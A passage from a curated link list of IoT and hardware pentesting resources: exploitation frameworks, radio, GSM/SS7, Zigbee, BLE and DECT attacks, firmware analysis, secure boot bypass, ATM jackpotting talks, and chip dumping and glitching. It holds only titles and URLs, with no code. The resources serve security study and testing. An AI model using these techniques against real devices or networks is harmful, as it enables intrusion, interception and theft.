RTOS for IoT Embedded Devices](https://www.zephyrproject.org/) - [ICS - Controlthings.io](https://www.controlthings.io/platform) ******************************************************************************************************************************** ### Exploitation Tools - [Expliot - IoT Exploitation framework - by Aseemjakhar](https://gitlab.com/expliot_framework/expliot) - [Routersploit (Exploitation Framework for Embedded Devices)](https://github.com/threat9/routersploit) - [IoTSecFuzz (comprehensive testing for IoT device)](https://gitlab.com/invuls/iot-projects/iotsecfuzz) - [HomePwn - Swiss Army Knife for Pentesting of IoT Devices](https://github.com/ElevenPaths/HomePWN) - [killerbee - Zigbee exploitation](https://github.com/riverloopsec/killerbee) - [PRET - Printer Exploitation Toolkit](https://github.com/RUB-NDS/PRET) - [HAL – The Hardware Analyzer](https://github.com/emsec/hal) - [FwAnalyzer (Firmware Analyzer)](https://github.com/cruise-automation/fwanalyzer) - [ISF(Industrial Security Exploitation Framework](https://github.com/w3h/isf) - [PENIOT: Penetration Testing Tool for IoT](https://github.com/yakuza8/peniot) - [MQTT-PWN](https://github.com/akamai-threat-research/mqtt-pwn) ******************************************************************************************************************************** ### Reverse Engineering Tools - [IDA Pro](https://www.youtube.com/watch?v=fgMl0Uqiey8) - [GDB](https://www.youtube.com/watch?v=fgMl0Uqiey8) - [Radare2](https://radare.gitbooks.io/radare2book/content/) | [cutter](https://cutter.re/) - [Ghidra](https://ghidra-sre.org/) ******************************************************************************************************************************** ## Introduction - [Introduction to IoT](https://en.wikipedia.org/wiki/Internet_of_things) - [IoT Architecture](https://www.c-sharpcorner.com/UploadFile/f88748/internet-of-things-part-2/) - [IoT attack surface](https://www.owasp.org/index.php/IoT_Attack_Surface_Areas) - [IoT Protocols Overview](https://www.postscapes.com/internet-of-things-protocols/) ******************************************************************************************************************************** ### IoT Web and message services #### MQTT - [Introduction](https://www.hivemq.com/blog/mqtt-essentials-part-1-introducing-mqtt) - [Hacking the IoT with MQTT](https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b) - [thoughts about using IoT MQTT for V2V and Connected Car from CES 2014](https://mobilebit.wordpress.com/tag/mqtt/) - [Nmap](https://nmap.org/nsedoc/lib/mqtt.html) - [The Seven Best MQTT Client Tools](https://www.hivemq.com/blog/seven-best-mqtt-client-tools) - [A Guide to MQTT by Hacking a Doorbell to send Push Notifications](https://youtu.be/J_BAXVSVPVI) - [Are smart homes vulnerable to hacking](https://blog.avast.com/mqtt-vulnerabilities-hacking-smart-homes) - [Deep Learning UDF for KSQL / ksqlDB for Streaming Anomaly Detection of MQTT IoT Sensor Data](https://github.com/kaiwaehner/ksql-udf-deep-learning-mqtt-iot) - [Authenticating & Authorizing Devices using MQTT with Auth0](https://auth0.com/docs/integrations/authenticate-devices-using-mqtt) - [Development information for the MQTT with hardware](https://www.hackster.io/search?i=projects&q=Mqtt) - [Understanding the MQTT Protocol Packet Structure](http://www.steves-internet-guide.com/mqtt-protocol-messages-overview/) - [R7-2019-18: Multiple Hickory Smart Lock Vulnerabilities](https://blog.rapid7.com/2019/08/01/r7-2019-18-multiple-hickory-smart-lock-vulnerabilities/) - [IoT Live Demo: 100.000 Connected Cars With Kubernetes, Kafka, MQTT, TensorFlow](https://dzone.com/articles/iot-live-demo-100000-connected-cars-with-kubernete) #### Softwares - [Mosquitto-An open source MQTT broker](https://mosquitto.org/) - [HiveMQ](https://www.hivemq.com/) - [MQTT Explorer](http://mqtt-explorer.com/) - [MQTT proxy - IoXY](https://blog.nviso.eu/2020/07/06/introducing-ioxy-an-open-source-mqtt-intercepting-proxy/) - [MQTT Broker Security - 101](https://payatu.com/blog/dattatray/iot-security-%E2%80%93-part-12-mqtt-broker-security---101) - [Welcome to MQTT-PWN!](https://mqtt-pwn.readthedocs.io/en/latest/) #### CoAP - [Introduction](http://coap.technology/) - [CoAP client Tools](http://coap.technology/tools.html) - [CoAP Pentest Tools](https://bitbucket.org/aseemjakhar/expliot_framework) - [Nmap - NSE for coap](https://nmap.org/nsedoc/lib/coap.html) ******************************************************************************************************************************** ### RADIO HACKER QUICK START GUIDE - [Complete course in Software Defined Radio (SDR) by Michael Ossmann](https://greatscottgadgets.com/sdr/) - [SDR Notes - Radio IoT Protocols Overview](https://github.com/notpike/SDR-Notes) - [Understanding Radio](https://www.taitradioacademy.com/lessons/introduction-to-radio-communications-principals/) - [Introduction to Software Defined Radio](https://www.allaboutcircuits.com/technical-articles/introduction-to-software-defined-radio/) - [Introduction Gnuradio companion](https://wiki.gnuradio.org/index.php/Guided_Tutorial_GRC#Tutorial:_GNU_Radio_Companion) - [Creating a flow graph in gunradiocompanion](https://blog.didierstevens.com/2017/09/19/quickpost-creating-a-simple-flow-graph-with-gnu-radio-companion/) - [Analysing radio signals 433Mhz ](https://www.rtl-sdr.com/analyzing-433-mhz-transmitters-rtl-sdr/) - [Recording specific radio signal](https://www.rtl-sdr.com/freqwatch-rtl-sdr-frequency-scanner-recorder/) - [Replay Attacks with raspberrypi -rpitx](https://www.rtl-sdr.com/tutorial-replay-attacks-with-an-rtl-sdr-raspberry-pi-and-rpitx/) ### Cellular Hacking GSM BTS #### BTS - [Awesome-Cellular-Hacking](https://github.com/W00t3k/Awesome-Cellular-Hacking/blob/master/README.md) - [what is base tranceiver station](https://en.wikipedia.org/wiki/Base_transceiver_station) - [How to Build Your Own Rogue GSM BTS](https://l33t.gg/how-to-build-a-rogue-gsm-bts/) #### GSM SS7 Pentesting - [Introduction to GSM Security](http://www.pentestingexperts.com/introduction-to-gsm-security/) - [GSM Security 2 ](https://www.ehacking.net/2011/02/gsm-security-2.html) - [vulnerabilities in GSM security with USRP B200](https://ieeexplore.ieee.org/document/7581461/) - [Security Testing 4G (LTE) Networks](https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-44con-lte-presentation-2012-09-11.pdf) - [Case Study of SS7/SIGTRAN Assessment](https://nullcon.net/website/archives/pdf/goa-2017/case-study-of-SS7-sigtran.pdf) - [Telecom Signaling Exploitation Framework - SS7, GTP, Diameter & SIP](https://github.com/SigPloiter/SigPloit) - [ss7MAPer – A SS7 pen testing toolkit](https://n0where.net/ss7-pentesting-toolkit-ss7maper) - [Introduction to SIGTRAN and SIGTRAN Licensing](https://www.youtube.com/watch?v=XUY6pyoRKsg) - [SS7 Network Architecture](https://youtu.be/pg47dDUL1T0) - [Introduction to SS7 Signaling](https://www.patton.com/whitepapers/Intro_to_SS7_Tutorial.pdf) - [Breaking LTE on Layer Two](https://alter-attack.net/) #### Hardware Tools - [Fake BTS Detector (SCL-8521)](https://www.shoghicom.com/fake-bts-detector.php) ******************************************************************************************************************************** ### Zigbee ALL Stuff - [Introduction and protocol Overview](http://www.informit.com/articles/article.aspx?p=1409785) - [Hacking Zigbee Devices with Attify Zigbee Framework](https://blog.attify.com/hack-iot-devices-zigbee-sniffing-exploitation/) - [Hands-on with RZUSBstick](https://uk.rs-online.com/web/p/radio-frequency-development-kits/6962415/) - [ZigBee & Z-Wave Security Brief](http://www.riverloopsecurity.com/blog/2018/05/zigbee-zwave-part1/) - [Hacking ZigBee Networks](https://resources.infosecinstitute.com/topic/hacking-zigbee-networks/) - [Zigator: Analyzing the Security of Zigbee-Enabled Smart Homes](https://mews.sv.cmu.edu/papers/wisec-20.pdf) - [Security Analysis of Zigbee Networks with Zigator and GNU Radio](https://mews.sv.cmu.edu/research/zigator/testbed-grcon2020-slides.pdf) - [Low-Cost ZigBee Selective Jamming](https://www.bastibl.net/reactive-zigbee-jamming/) #### SW Tools - [zigbear](https://github.com/philippnormann/zigbear) - [ZigDiggity](https://github.com/BishopFox/zigdiggity) - [Zigator](https://github.com/akestoridis/zigator) - [Z3sec](https://github.com/IoTsec/Z3sec) #### Hardware Tools for Zigbee - [APIMOTE IEEE 802.15.4/ZIGBEE SNIFFING HARDWARE](https://www.riverloopsecurity.com/projects/apimote/) - [RaspBee-The Raspberry Pi Zigbee gateway](https://phoscon.de/en/raspbee/) - [USRP SDR 2](https://www.ettus.com/products/) - [ATUSB IEEE 802.15.4 USB Adapter](http://shop.sysmocom.de/products/atusb) - [nRF52840-Dongle](https://www.nordicsemi.com/Software-and-tools/Development-Kits/nRF52840-Dongle) ******************************************************************************************************************************** ### BLE Intro and SW-HW Tools to pentest - [Step By Step guide to BLE Understanding and Exploiting](https://github.com/V33RU/BLE-NullBlr) - [Traffic Engineering in a Bluetooth Piconet](http://www.diva-portal.org/smash/get/diva2:833159/FULLTEXT01.pdf) - [BLE Characteristics](https://devzone.nordicsemi.com/nordic/short-range-guides/b/bluetooth-low-energy/posts/ble-characteristics-a-beginners-tutorial) #### Bluetooth and BLE Pentest Tools - [btproxy](https://github.com/conorpp/btproxy) - [hcitool & bluez](https://www.pcsuggest.com/linux-bluetooth-setup-hcitool-bluez) - [Testing With GATT Tool](https://www.jaredwolff.com/blog/get-started-with-bluetooth-low-energy/) - [crackle-Cracking encryption](https://github.com/mikeryan/crackle) - [bettercap](https://github.com/bettercap/bettercap) - [BtleJuice Bluetooth Smart Man-in-the-Middle framework](https://github.com/DigitalSecurity/btlejuice) - [gattacker](https://github.com/securing/gattacker) - [BTLEjack Bluetooth Low Energy Swiss army knife](https://github.com/virtualabs/btlejack) - [bluing-An intelligence gathering tool for hacking Bluetooth](https://github.com/fO-000/bluing) - [DEDSEC-Bluetooth-exploit](https://github.com/0xbitx/DEDSEC-Bluetooth-exploit) #### Hardware for bluetooth hacking - [NRFCONNECT - 52840](https://www.nordicsemi.com/Software-and-tools/Development-Kits/nRF52840-Dongle) - [EDIMAX](https://www.nordicsemi.com/Software-and-tools/Development-Kits/nRF52840-Dongle) - [CSR 4.0](https://www.amazon.in/GENERIC-Ultra-Mini-Bluetooth-Dongle-Adapter/dp/B0117H7GZ6/ref=asc_df_B0117H7GZ6/?tag=googleshopdes-21&linkCode=df0&hvadid=396984700257&hvpos=1o1&hvnetw=g&hvrand=2179727910417729406&hvpone=&hvptwo=&hvqmt=&hvdev=c&hvdvcmdl=&hvlocint=&hvlocphy=9061998&hvtargid=pla-343685677347&psc=1&ext_vrnc=hi) - [ESP32 - Development and learning Bluetooth](https://www.espressif.com/en/products/hardware/esp32/overview) - [Ubertooth](https://github.com/greatscottgadgets/ubertooth/wiki/Ubertooth-One) - [Sena 100](http://www.senanetworks.com/ud100-g03.html) - [ESP-WROVER-KIT-VB](https://www.digikey.in/en/products/detail/espressif-systems/ESP-WROVER-KIT-VB/8544301) #### BLE Pentesting Tutorials - [Bluetooth vs BLE Basics](https://github.com/V33RU/BLE-NullBlr) - [Finding bugs in Bluetooth](https://bluetooth.lol/) - [Intel Edison as Bluetooth LE — Exploit box](https://medium.com/@arunmag/intel-edison-as-bluetooth-le-exploit-box-a63e4cad6580) - [How I Reverse Engineered and Exploited a Smart Massager](https://medium.com/@arunmag/how-i-reverse-engineered-and-exploited-a-smart-massager-ee7c9f21bf33) - [My journey towards Reverse Engineering a Smart Band — Bluetooth-LE RE](https://medium.com/@arunmag/my-journey-towards-reverse-engineering-a-smart-band-bluetooth-le-re-d1dea00e4de2) - [Bluetooth Smartlocks](https://www.getkisi.com/blog/smart-locks-hacked-bluetooth-ble) - [I hacked MiBand 3](https://medium.com/@yogeshojha/i-hacked-xiaomi-miband-3-and-here-is-how-i-did-it-43d68c272391) - [GATTacking Bluetooth Smart Devices](https://securing.pl/en/gattacking-bluetooth-smart-devices-introducing-a-new-ble-proxy-tool/index.html) - [blueooth beacon vulnerability](https://www.beaconzone.co.uk/blog/category/security/) - [Sweyntooth Vulnerabilties](https://asset-group.github.io/disclosures/sweyntooth/) - [AIRDROP_LEAK - sniffs BLE traffic and displays status messages from Apple devices](https://github.com/hexway/apple_bleee) - [BRAKTOOTH: Causing Havoc on Bluetooth Link Manager](https://asset-group.github.io/disclosures/braktooth/) - [Practical Introduction to BLE GATT Reverse Engineering: Hacking the Domyos EL500](https://jcjc-dev.com/2023/03/19/reversing-domyos-el500-elliptical/) - [MojoBox - yet another not so smartlock](https://mandomat.github.io/2023-03-15-testing-mojobox-security/) - [bluetooth-hacking](https://github.com/zedxpace/bluetooth-hacking-) ******************************************************************************************************************************** ### DECT (Digital Enhanced Cordless Telecommunications) - [Real Time Interception And Monitoring Of A DECT Cordless Telephone](https://www.youtube.com/watch?v=MDF1eUvOte0&ab_channel=RobVK8FOES) - [Eavesdropping On Unencrypted DECT Voice Traffic](https://www.youtube.com/watch?v=WBvYsXrs3DI&ab_channel=RobVK8FOES) - [Decoding DECT Voice Traffic: In-depth Explanation](https://www.youtube.com/watch?v=oiMkirm_xfY&ab_channel=RobVK8FOES) #### Software Tools && Hardware Tools ##### Software ##### Hardware ******************************************************************************************************************************** ### Mobile security (Android & iOS) - [Android App Reverse Engineering 101](https://maddiestone.github.io/AndroidAppRE/) - [Android Application pentesting book](https://www.packtpub.com/hardware-and-creative/learning-pentesting-android-devices) - [Android Pentest Video Course-TutorialsPoint](https://www.youtube.com/watch?v=zHknRia3I6s&list=PLWPirh4EWFpESLreb04c4eZoCvJQJrC6H) - [IOS Pentesting](https://web.securityinnovation.com/hubfs/iOS%20Hacking%20Guide.pdf?) - [OWASP Mobile Security Testing Guide](https://owasp.org/www-project-mobile-security-testing-guide/) - [Android Tamer - Android Tamer is a Virtual / Live Platform for Android Security professionals](https://androidtamer.com/) ******************************************************************************************************************************* ### Online Assemblers - [AZM Online Arm Assembler by Azeria](https://azeria-labs.com/azm/) - [Online Disassembler](https://onlinedisassembler.com/odaweb/) - [Compiler Explorer is an interactive online compiler which shows the assembly output of compiled C++, Rust, Go](https://godbolt.org/) ******************************************************************************************************************************** ### ARM - [Azeria Labs](https://azeria-labs.com/) - [ARM EXPLOITATION FOR IoT](https://www.exploit-db.com/docs/english/43906-arm-exploitation-for-iot.pdf) - [Damn Vulnerable ARM Router (DVAR)](https://blog.exploitlab.net/2018/01/dvar-damn-vulnerable-arm-router.html) - [EXPLOIT.EDUCATION](https://exploit.education/) ******************************************************************************************************************************** ### Pentesting Firmwares and emulating and analyzing ##### Firmware Analysis Tools - [EMBA-An analyzer for embedded Linux firmware](https://p4cx.medium.com/emba-b370ce503602) - [FACT-Firmware Analysis and Comparison Tool](https://github.com/fkie-cad/FACT_core) - [Binwalk](https://github.com/ReFirmLabs/binwalk) - [Qiling](https://github.com/qilingframework/qiling) - [fwanalyzer](https://github.com/cruise-automation/fwanalyzer) - [ByteSweep](https://gitlab.com/bytesweep/bytesweep) - [Firmwalker](https://github.com/craigz28/firmwalker) - [Checksec.sh](https://github.com/slimm609/checksec.sh) - [QEMU](https://www.qemu.org/) - [Firmadyne](https://github.com/firmadyne/firmadyne) - [Firmware Modification Kit](https://code.google.com/archive/p/firmware-mod-kit/) ##### Resources - [Firmware analysis and reversing](https://www.owasp.org/index.php/IoT_Firmware_Analysis) - [Reversing 101](https://0xinfection.github.io/reversing/) - [IoT Security Verification Standard (ISVS)](https://github.com/OWASP/IoT-Security-Verification-Standard-ISVS) - [OWASP Firmware Security Testing Methodology](https://scriptingxss.gitbook.io/firmware-security-testing-methodology/) - [Firmware emulation with QEMU](https://www.youtube.com/watch?v=G0NNBloGIvs) - [Reversing ESP8266 Firmware](https://boredpentester.com/reversing-esp8266-firmware-part-1/) - [Emulating Embedded Linux Devices with QEMU](https://www.novetta.com/2018/02/emulating-embedded-linux-devices-with-qemu/?__cf_chl_captcha_tk__=2167fb6cf097848dbf0dea8e4ecccc66f2a55e55-1585030085-0-AVfO7wG_mHgvnIgeIl-aiKLNW1IMb5IMLyqLOSOLydnZFzhyAyySWgfKvjvllAtYtmpbJjnaTlwyaWiO2kHXH4APqLuott0R7UReYCTZ3u--g4AJBK4eONEL2bTJcAHg3fzmXhrC-3iAqccNQC4jx1RWEz60y_MKFq63NVeoE1pC0EBYWkk7VqDWusBFbgpj6zRNv0ifKLc3oLYJck-oG13jeSbPISVLMCn6bCHVLaTp2gW7qG6GRELIWgdyfP9viyMDSAww3u-R1NmUgRQzctXIYMWH1MdL5p8lqbSpCa160cW3JaZ16IxT7iP1HkCBurx7rCOVP3DAcI8zrc19V9mi-jU9nXIW0Xf9eIpqlUP-R_txfNw4vF10PwIGKmg0Cpl2IDuY1ty3J8koQkdvxfE) - [Emulating Embedded Linux Systems with QEMU](https://www.novetta.com/2018/02/emulating-embedded-linux-systems-with-qemu/?__cf_chl_captcha_tk__=9dd83a08cffb28fae75286f63f399c34eec56852-1585030087-0-AblGAUd4LCDVbghNgQyfL5hgPXNC8pUcLIAbPUpx2tBOb_L4gVVc1sZ7Ivg0g--06WpkdpeV-kylZu3T_Yqgr7GdFpc2cKzxATdc_bsEV7uu1ljIctFloHTW_B1vvjFAe3QXdex4kkn2D4HuQiw9WLszvO2Ff8SvvfEpHoBumOavj-c2iXcEb2dDFMoK3_HB_3-y7q_BEAX3xqDCjqz7TpcoIWt-wTSQwRfx-VuBfO87hrTsX43yzq6BNjCE9s15ZQmPp_NouYIHNMnx3augAfkwZBSUA0r43GbA--3jLmJsTe_qvcn7gMz_HAR-GpnA_Usn_cr94VqtyNpl0vEsC1OMf48oBMMoFQJA6Jjn1hGPv5hV4M4aBtJrTnFoRP2YGwxAyNTM3Df9qw1iyBB8r58) - [Fuzzing Embedded Linux Devices](https://www.novetta.com/2018/07/fuzzing-embedded-linux-devices/?__cf_chl_captcha_tk__=f07f3f76e61b43f9ae6340e94cf4adeaec87977e-1585030089-0-AYkRNbh1wpUia0P5wBgrRfhf92Uy6Pl2mEEBOXi2FUvxROOJ9obK4ZIS78Y4iCRrMdi3umwQrJEyF0u3EPwHPu3_22f5PwOvVDFC0QwFPyw7LkY5bLuansI_8uoEunuLIEQ1VPIZHFpht1vT0_rW4YrYGc8osJZpubAhXfyZe1G7U_ibpZj9tdrUE6SwgA_Ph0io4LRfbjuvpeM03NHuc1sTTqRVdkWiw47kmr9uSAK10ZmQEvE7zpbpkEJM2slchjdYq6hziM3L5l8vB-eEm_JVxsSHbGfdDM3kSfTw3oXlYkvxvLy_llSyyefuub4yOBrqNgzV1Gj_PDTmuRTMxobGo7vZaRdr2LgOXML58kpG6NTDLb3A4YzwVw9u32ErRh4Ab89vn90RsHlWnU928Oc) - [Emulating ARM Router Firmware](https://azeria-labs.com/emulating-arm-firmware/) - [Reversing Firmware With Radare](https://www.bored-nerds.com/reversing/radare/automotive/2019/07/07/reversing-firmware-with-radare.html) - [Samsung Firmware Magic - Unpacking and Decrypting](https://github.com/chrivers/samsung-firmware-magic) - [Qiling & Binary Emulation for automatic unpacking](https://kernemporium.github.io/articles/en/auto_unpacking/m.html) - [Reverse engineering with #Ghidra: Breaking an embedded firmware encryption scheme](https://www.youtube.com/watch?v=4urMITJKQQs&ab_channel=stacksmashing) - [Simulating and hunting firmware vulnerabilities with Qiling](https://blog.vincss.net/2020/12/pt007-simulating-and-hunting-firmware-vulnerabilities-with-Qiling.html?m=1&s=09) ******************************************************************************************************************************** ### Firmware samples to pentest - [Download From here by firmware.center](https://firmware.center/) ******************************************************************************************************************************** ### Symlinks Attacks - [Zip Slip Vulnerability](https://security.snyk.io/research/zip-slip-vulnerability) ******************************************************************************************************************************** ### Secureboot #### Dev - [Writing a Bootloader](http://3zanders.co.uk/2017/10/13/writing-a-bootloader/) #### Hacking - [Pwn the ESP32 Secure Boot](https://limitedresults.com/2019/09/pwn-the-esp32-secure-boot/) - [Pwn the ESP32 Forever: Flash Encryption and Sec. Boot Keys Extraction](https://limitedresults.com/2019/11/pwn-the-esp32-forever-flash-encryption-and-sec-boot-keys-extraction/) - [Amlogic S905 SoC: bypassing the (not so) Secure Boot to dump the BootROM](https://fredericb.info/2016/10/amlogic-s905-soc-bypassing-not-so.html) / [another-link](https://www.cnx-software.com/2016/10/06/hacking-arm-trustzone-secure-boot-on-amlogic-s905-soc/) - [Defeating Secure Boot with Symlink Attacks](https://www.anvilsecure.com/blog/defeating-secure-boot-with-symlink-attacks.html) - [PS4 Aux Hax 5 & PSVR Secure Boot Hacking with Keys by Fail0verflow!](https://www.psxhax.com/threads/ps4-aux-hax-5-psvr-secure-boot-hacking-with-keys-by-fail0verflow.12820/) - [ECLYPSIUM DISCOVERS MULTIPLE VULNERABILITIES AFFECTING 129 DELL MODELS VIA DELL REMOTE OS RECOVERY AND FIRMWARE UPDATE CAPABILITIES](https://eclypsium.com/2021/06/24/biosdisconnect/) - [Technical Advisory – U-Boot – Unchecked Download Size and Direction in USB DFU (CVE-2022-2347)](https://research.nccgroup.com/2023/01/20/technical-advisory-u-boot-unchecked-download-size-and-direction-in-usb-dfu-cve-2022-2347/) ******************************************************************************************************************************** ### Storage Medium #### EMMC HACKING - [HARDWARE HACKING 101: IDENTIFYING AND DUMPING EMMC FLASH](https://www.riverloopsecurity.com/blog/2020/03/hw-101-emmc/) - [EMMC DATA RECOVERY FROM DAMAGED SMARTPHONE](https://dangerouspayload.com/2018/10/24/emmc-data-recovery-from-damaged-smartphone/) - [Another bunch of Atricles for EMMC](https://hackaday.com/tag/emmc/) - [Unleash your smart-home devices: Vacuum Cleaning Robot Hacking](https://media.ccc.de/v/34c3-9147-unleash_your_smart-home_devices_vacuum_cleaning_robot_hacking#t=1810) - [Hands-On IoT Hacking: Rapid7 at DEF CON 30 IoT Village, Part 1](https://www.rapid7.com/blog/post/2022/10/18/hands-on-iot-hacking-rapid7-at-def-con-30-iot-village-part-1/) ******************************************************************************************************************************** ### Payment Device Security #### ATM Hacking - [Introduction to ATM Penetration Testing](https://www.youtube.com/watch?v=Ff-0zXTYhuA) - [Pwning ATMs For Fun and Profit](https://www.youtube.com/watch?v=9cG-JL0LHYw) - [Jackpotting Automated Teller Machines Redux](https://www.youtube.com/watch?v=4StcW9OPpPc) By Barnaby Jack ******************************************************************************************************************************** ### IoT hardware Overview and Hacking - [IoT Hardware Guide](https://www.postscapes.com/internet-of-things-hardware/) - [Intro To Hardware Hacking - Dumping Your First Firmware](https://blog.nvisium.com/intro-to-hardware-hacking-dumping-your-first-firmware) #### Hardware Gadgets to pentest - [Bus Pirate](https://www.sparkfun.com/products/12942) - [EEPROM reader/SOIC Cable](https://www.sparkfun.com/products/13153) - [Jtagulator/Jtagenum](https://www.adafruit.com/product/1550) - [Logic Analyzer](https://www.saleae.com/) - [The Shikra](https://int3.cc/products/the-shikra) - [FaceDancer21 (USB Emulator/USB Fuzzer)](https://int3.cc/products/facedancer21) - [RfCat](https://int3.cc/products/rfcat) - [Hak5Gear- Hak5FieldKits](https://hakshop.com/) - [Ultra-Mini Bluetooth CSR 4.0 USB Dongle Adapter](https://www.ebay.in/itm/Ultra-Mini-Bluetooth-CSR-4-0-USB-Dongle-Adapter-Black-Golden-with-2-yr-wrnty-/332302813975) - [Attify Badge - UART, JTAG, SPI, I2C (w/ headers)](https://www.attify-store.com/products/attify-badge-assess-security-of-iot-devices) #### Attacking Hardware Interfaces - [An Introduction to Hardware Hacking](https://securityboulevard.com/2020/09/an-introduction-to-hardware-hacking/) - [Serial Terminal Basics](https://learn.sparkfun.com/tutorials/terminal-basics/all) - [Reverse Engineering Serial Ports](http://www.devttys0.com/2012/11/reverse-engineering-serial-ports/) - [REVERSE ENGINEERING ARCHITECTURE AND PINOUT OF CUSTOM ASICS](https://sec-consult.com/en/blog/2019/02/reverse-engineering-architecture-pinout-plc/) - [ChipWhisperer - Hardware attacks](http://wiki.newae.com/Main_Page) - [Hardware hacking tutorial: Dumping and reversing firmware](https://ivanorsolic.github.io/post/hardwarehacking1/) #### SPI - [Reading FlashROMS - Youtube](https://www.youtube.com/results?search_query=reading+chip+flash+rom) - [Dumping the firmware From Router using BUSPIRATE - SPI Dump](https://www.iotpentest.com/2019/06/dumping-firmware-from-device-using.html) - [How to Flash Chip of a Router With a Programmer | TP-Link Router Repair & MAC address change](https://www.youtube.com/watch?v=fbt4OJXJdOc&ab_channel=ElectricalProjects%5BCreativeLab%5D) - [Extracting Flash Memory over SPI](https://akimbocore.com/article/extracting-flash-memory-over-spi/) - [Extracting Firmware from Embedded Devices (SPI NOR Flash)](https://www.youtube.com/watch?v=nruUuDalNR0&ab_channel=FlashbackTeam) - [SPI-Blogs](https://www.google.com/search?q=%22spi+dump%22&source=hp&ei=5jv9YaW6JNvl2roPgbGqMA&iflsig=AHkkrS4AAAAAYf1J9qNY6Snarz3dsHr9KXF1YSY6AKVL&ved=0ahUKEwilxY3apOb1AhXbslYBHYGYCgYQ4dUDCAg&uact=5&oq=%22spi+dump%22&gs_lcp=Cgdnd3Mtd2l6EAMyBggAEBYQHjIGCAAQFhAeMgYIABAWEB4yBggAEBYQHjIGCAAQFhAeMgYIABAWEB4yBggAEBYQHjIGCAAQFhAeMgYIABAWEB4yCAgAEBYQChAeUABYAGC-A2gAcAB4AIABYIgBYJIBATGYAQCgAQKgAQE&sclient=gws-wiz) #### UART - [Identifying UART interface](https://www.mikroe.com/blog/uart-serial-communication) - [onewire-over-uart](https://github.com/dword1511/onewire-over-uart) - [Accessing sensor via UART](http://home.wlu.edu/~levys/courses/csci250s2017/SensorsSignalsSerialSockets.pdf) - [Using UART to connect to a chinese IP cam](https://www.davidsopas.com/using-uart-to-connect-to-a-chinese-ip-cam/) - [A journey into IoT – Hardware hacking: UART](https://techblog.mediaservice.net/2019/03/a-journey-into-iot-hardware-hacking-uart/) - [UARTBruteForcer](https://github.com/FireFart/UARTBruteForcer) - [UART Connections and Dynamic analysis on Linksys e1000](https://www.youtube.com/watch?v=ix6rSV2Dj44&ab_channel=Defenceindepth) - [Accessing and Dumping Firmware Through UART](https://www.cyberark.com/resources/threat-research-blog/accessing-and-dumping-firmware-through-uart) - [UART Exploiter](https://github.com/exploitsecurityio/uart-exploiter) #### JTAG - [HARDWARE HACKING 101: INTRODUCTION TO JTAG](https://www.riverloopsecurity.com/blog/2021/05/hw-101-jtag/) - [How To Find The JTAG Interface - Hardware Hacking Tutorial](https://www.youtube.com/watch?v=_FSM_10JXsM&ab_channel=MakeMeHack) - [Buspirate JTAG Connections - Openocd](https://research.kudelskisecurity.com/2014/05/01/jtag-debugging-made-easy-with-bus-pirate-and-openocd/#:~:text=The%20Bus%20Pirate%20is%20an,protocols%20like%20I%C2%B2C%20and%20SPI.) - [Extracting Firmware from External Memory via JTAG](https://www.youtube.com/watch?v=IadnBUJAvks&ab_channel=JoeGrand) - [Analyzing JTAG](https://nse.digital/pages/guides/hardware/jtag.html) - [The hitchhacker’s guide to iPhone Lightning & JTAG hacking](https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/stacksmashing%20-%20The%20hitchhackers%20guide%20to%20iPhone%20Lightning%20%20%20JTAG%20hacking.pdf) #### SideChannel Attacks - [Side channel attacks](https://yifan.lu/) - [Attacks on Implementations of Secure Systems](https://github.com/Yossioren/AttacksonImplementationsCourseBook) - [fuzzing, binary analysis, IoT security, and general exploitation](https://github.com/0xricksanchez/paper_collection) - [Espressif ESP32: Bypassing Encrypted Secure Boot(CVE-2020-13629)](https://raelize.com/blog/espressif-esp32-bypassing-encrypted-secure-boot-cve-2020-13629/) - [Breaking AES with ChipWhisperer - Piece of scake (Side Channel Analysis 100)](https://www.youtube.com/watch?v=FktI4qSjzaE&ab_channel=LiveOverflow) - [Researchers use Rowhammer bit flips to steal 2048-bit crypto key](https://arstechnica.com/information-technology/2019/06/researchers-use-rowhammer-bitflips-to-steal-2048-bit-crypto-key/) #### Glitching attacks - [NAND Glitching Attack](http://www.brettlischalk.com/posts/nand-glitching-wink-hub-for-root) - [Tutorial CW305-4 Voltage Glitching with Crowbars](https://wiki.newae.com/index.php?title=Tutorial_CW305-4_Voltage_Glitching_with_Crowbars&mobileaction=toggle_view_mobile) - [Voltage Glitching Attack using SySS iCEstick Glitcher](https://www.youtube.com/watch?v=FVUhVewFmxw&feature=youtu.be&ab_channel=SySSPentestTV) - [Samy Kamkar - FPGA Glitching & Side Channel Attacks](https://www.youtube.com/watch?v=oGndiX5tvEk) - [Hardware Power Glitch Attack (Fault Injection) - rhme2 Fiesta (FI 100)](https://www.youtube.com/watch?v=6Pf3pY3GxBM&ab_channel=LiveOverflow) - [Keys in flash - Glitching AES keys from an Arduino / ATmega with a camera flash](https://srfilipek.medium.com/keys-in-a-flash-3e984d0de54b) - [Implementing Practical Electrical Glitching Attacks](blackhat.com/docs/eu-15/materials/eu-15-Giller-Implementing-Electrical-Glitching-Attacks.pdf) ******************************************************************************************************************************** ### Awesome IoT Pentesting Guides - [Shodan Pentesting Guide](https://community.turgensec.com/shodan-pentesting-guide/) - [Car Hacking Practical Guide 101](https://medium.com/@yogeshojha/car-hacking-101-practical-guide-to-exploiting-can-bus-using-instrument-cluster-simulator-part-i-cd88d3eb4a53) - [OWASP Firmware Security Testing Methodology ](https://scriptingxss.gitbook.io/firmware-security-testing-methodology/) - [Awesome-bluetooth-security](https://github.com/engn33r/awesome-bluetooth-security) ******************************************************************************************************************************** ### Fuzzing Things - [OWASP Fuzzing Info](https://owasp.org/www-community/Fuzzing) - [Fuzzing_ICS_protocols](https://1modm.github.io/Fuzzing_ICS_protocols.html) - [Fuzzowski - the Network Protocol Fuzzer that we will want to use](https://hakin9.org/fuzzowski-the-network-protocol-fuzzer-that-we-will-want-to-use/) - [Fuzz Testing of Application Reliability](https://pages.cs.wisc.edu/~bart/fuzz/) - [FIRM-AFL : High-Throughput Greybox Fuzzing of IoT Firmware via Augmented Process Emulation](https://www.usenix.org/conference/usenixsecurity19/presentation/zheng) - [Snipuzz : Black-box Fuzzing of IoT Firmware via Message Snippet Inference](https://arxiv.org/pdf/2105.05445.pdf) - [fuzzing-iot-binaries] - [part1](https://blog.attify.com/fuzzing-iot-devices-part-1/) / [part2](https://blog.attify.com/fuzzing-iot-binaries-with-afl-part-ii/) ******************************************************************************************************************************** ### FlipperZero #### Custom firmwares - Flipper Zero Unleashed Firmware : https://github.com/DarkFlippers/unleashed-firmware - 